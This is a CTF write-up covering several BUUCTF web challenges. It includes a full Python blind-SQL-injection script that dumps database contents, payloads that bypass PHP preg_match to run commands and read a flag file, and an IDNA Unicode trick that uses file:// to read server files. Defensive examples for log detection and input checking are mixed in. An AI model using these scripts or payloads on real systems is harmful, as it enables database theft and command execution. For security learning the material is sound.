buuctf.web 64-96

1. [WUSTCTF2020] 颜值成绩查询

Topic: SQL injection - blind injection

Solution:

(1) Inputs 1 to 4 all produce output, but at 5 there is none, so this is a boolean-based blind injection; the XOR blind-injection approach is used.
Reference link

```python
import time
import requests

Success_message = "Hi"  # text that only appears in the page when the injected condition is true


def database_name():
    # Recover the database name one character at a time: binary search over
    # printable ASCII (32..126), using the boolean response as the oracle
    db_name = ''
    for i in range(1, 10):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + "?stunum=(ascii(substr(database(), %d, 1)) > %d)" % (i, mid)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:  # no character at this position: end of the string
            print()
            break
        db_name += chr(mid)
        print("数据库名: " + db_name)
    return db_name


def table_name():
    # Enumerate the table names of the current database via information_schema
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(table_name))from(' \
                            'information_schema.tables)where(table_schema=database())), %d, 1)) > %d)' % (j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print("表名: " + name)
    table_list = name.split(",")
    for tab_name in table_list:
        column_name(tab_name)


def column_name(tab_name):
    # Enumerate the column names of one table, then dump each column
    name = ''
    for j in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(group_concat(column_name))from(' \
                            'information_schema.columns)where(table_name="%s")and(table_schema=database())), %d, ' \
                            '1)) > %d)' % (tab_name, j, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        name += chr(mid)
        print(("%s表的字段名: " + name) % tab_name)
    column_list = name.split(",")
    for col_name in column_list:
        get_data(tab_name, col_name)


def get_data(tab_name, col_name):
    # Read the contents of one column, again character by character
    data = ''
    for i in range(1, 100):
        begin = 32
        end = 126
        mid = (begin + end) // 2
        while begin < end:
            payload = url + '?stunum=(ascii(substr((select(%s)from(%s)),%d,1)) > %d)' % (
                col_name, tab_name, i, mid)
            time.sleep(0.2)
            res = requests.get(payload)
            if Success_message in res.text:
                begin = mid + 1
            else:
                end = mid
            mid = (begin + end) // 2
        if mid == 32:
            print()
            break
        data += chr(mid)
        print(("%s表的%s字段数据: " + data) % (tab_name, col_name))


if __name__ == '__main__':
    url = input("请输入url:")  # module-level global used by every function above
    database_name()
    table_name()
```
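From the defender's side, a small detector for the probe traffic a script like the one above generates, as an added example that is not part of the original writeup; the access-log lines are constructed, and the log format and the alert threshold are assumptions:

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the challenge server): one client sends
# three probes shaped like the script above, another sends two normal lookups.
SAMPLE_LOG = """\
10.0.0.7 - - [01/Nov/2025:10:00:01 +0000] "GET /?stunum=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Nov/2025:10:00:02 +0000] "GET /?stunum=(ascii(substr(database(),1,1))>79) HTTP/1.1" 200 512
10.0.0.9 - - [01/Nov/2025:10:00:02 +0000] "GET /?stunum=(ascii(substr(database(),1,1))>103) HTTP/1.1" 200 480
10.0.0.9 - - [01/Nov/2025:10:00:03 +0000] "GET /?stunum=(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema%3Ddatabase())),1,1))>79) HTTP/1.1" 200 512
10.0.0.7 - - [01/Nov/2025:10:00:04 +0000] "GET /?stunum=4 HTTP/1.1" 200 512
"""

# Combined-log-format line (assumed format): client IP and request target are all we need.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)')

# Signatures of the character-at-a-time technique: ascii(substr(...)) probes and
# information_schema / group_concat enumeration, matched after URL decoding.
PROBE_RE = re.compile(
    r'ascii\s*\(\s*substr|information_schema\.|group_concat\s*\(', re.IGNORECASE)


def is_blind_probe(target: str) -> bool:
    """True if any decoded query-string key or value looks like a blind-SQLi probe."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return any(PROBE_RE.search(part) for pair in pairs for part in pair)


def analyse(log_text: str, threshold: int = 3) -> dict:
    """Map client IP -> number of probe requests, for clients at or above threshold."""
    counts = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_blind_probe(m.group('target')):
            counts[m.group('ip')] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, n in analyse(SAMPLE_LOG).items():
        print(f"{ip}: {n} blind-injection probes")
```

A real extraction issues hundreds of such requests per recovered string, so the per-client count is the signal; the exact request shape varies and the regex only covers the functions used on this page.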

2. [FBCTF2019] RCEService

Topic: RCE - preg_match bypass

Solution:

(1) The hint says to input in JSON format; enter

```json
{"cmd":"ls"}
```

The response shows index.php, so the server is written in PHP. Entering other commands shows they are filtered, which means a regular expression via the preg_match function is in use. There are two ways to bypass preg_match.

(2) Method 1: use preg_match's maximum backtracking count to bypass it (PCRE backtrack-limit bypass).

Looking at the English PHP manual, pcre.backtrack_limit in php.ini controls the PCRE backtracking limit, default 1000000. Python script:

```python
import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","zz":"' + "a"*(1000000) + '"}'
res = requests.post("http://78850bfd-7aa8-4e32-bfab-181f587057c5.node4.buuoj.cn:81/", data={"cmd":payload})
print(res.text)
```

(3) Method 2: preg_match only matches the first line, so a newline %0A can be used to construct the payload.

```text
/?cmd={%0A"cmd": "ls /home"%0A}
/?cmd={%0A"cmd": "/bin/cat /home/rceservice/flag"%0A}
```
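To show why the newline trick works and how to check input so that it cannot, an added example (not from the writeup or the challenge) re-enacts the filter in Python's re module, whose `.`, `^` and `$` behave like PCRE's here; the denylist words and the allowlist commands are constructed assumptions. The hardened version also fails closed on any error, which is the same defence against the backtrack-limit bypass above, where PHP's preg_match returns false instead of 0:

```python
import json
import re

# Denylist in the style the writeup describes the filter as using: anchored with
# ^ and $ and without DOTALL, so "." never crosses a newline and a match must sit
# on a single line.  The word list is a constructed assumption.
WEAK_FILTER = re.compile(r'^.*(ls|cat|flag).*$')

# Allowlist for the hardened version (also constructed): a few harmless commands.
ALLOWED_CMD = re.compile(r'pwd|date|whoami')

# The two request bodies from the writeup: the plain one and the newline variant.
PLAIN_BODY = '{"cmd":"ls"}'
NEWLINE_BODY = '{\n"cmd": "ls /home"\n}'


def weak_check(raw_body: str) -> bool:
    """Accept unless the denylist matches the raw body (the bypassed logic)."""
    return WEAK_FILTER.search(raw_body) is None


def hardened_check(raw_body: str) -> bool:
    """Parse first, validate the decoded value against an allowlist with
    fullmatch, and treat any error as a rejection (fail closed)."""
    try:
        obj = json.loads(raw_body)
        if not isinstance(obj, dict) or not isinstance(obj.get("cmd"), str):
            return False
        return ALLOWED_CMD.fullmatch(obj["cmd"]) is not None
    except (ValueError, RecursionError):
        return False


if __name__ == "__main__":
    for body in (PLAIN_BODY, NEWLINE_BODY, '{"cmd":"pwd"}'):
        print(repr(body), "weak:", weak_check(body), "hardened:", hardened_check(body))
```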

3. [SUCTF 2019] Pythonginx

Topic: Unicode-to-IDNA domain-splitting vulnerability

Solution:

(1) Challenge source code

```python
# Imports and the app object are assumed from what the handler uses; the
# challenge excerpt shows only the route below.
from flask import Flask, request
from urllib import parse
from urllib.parse import urlsplit, urlunsplit
import urllib.request

app = Flask(__name__)


@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    # strip spaces from the url
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
```

(2) The task is how to bypass the IDN conversion.

Bypass method 1:

Unicode has a character ℀ (U+2100); when IDNA processes it, ℀ becomes a/c, so when you visit such a URL the DNS server automatically redirects it to another site.

```text
?url=file://suctf.c℆sr/local/nginx/conf/nginx.conf
file://suctf.c℆sr/fffffflag
```

Method 2: find other Unicode characters that punycode converts into a c:

```python
from urllib.parse import urlparse, urlunsplit, urlsplit
from urllib import parse


def get_unicode():
    # Try every character in the Basic Multilingual Plane in place of the
    # second "c" and report those that still reach the final host check
    for x in range(65536):
        uni = chr(x)
        url = "http://suctf.c{}".format(uni)
        try:
            if getUrl(url):
                print("str: " + uni + ' unicode: \\u' + str(hex(x))[2:])
        except Exception:  # idna codec and URL parsing raise on many characters
            pass


def getUrl(url):
    # Same logic as the challenge's getUrl, returning True where it would fetch
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return False
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return False
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return True
    else:
        return False


if __name__ == "__main__":
    get_unicode()
```

4. [0CTF 2016] piapiapia

Topic: deserialization string escape

Solution: reference link

More updates to follow!!!!
